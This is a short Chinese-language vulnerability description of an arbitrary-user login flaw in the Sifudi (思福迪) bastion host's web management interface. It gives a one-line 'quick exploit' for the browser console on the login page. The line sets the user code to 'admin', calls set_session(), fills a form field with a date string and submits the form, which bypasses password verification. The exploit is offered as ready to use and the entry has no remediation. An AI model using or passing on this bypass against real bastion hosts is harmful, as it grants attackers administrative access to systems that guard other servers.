Description
思福迪堡垒机存在任意用户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任意用户身份随意登录堡垒机Web管理界面,并可以正常的使用权限去操作。快速利用代码,在登录界面F12Console:document.getElementById("uCode").value="admin";set_session();document.getElementsByName("frm")[0][2].value="2019-01-0110:10:10";document.getElementsByName("frm") [0].submit();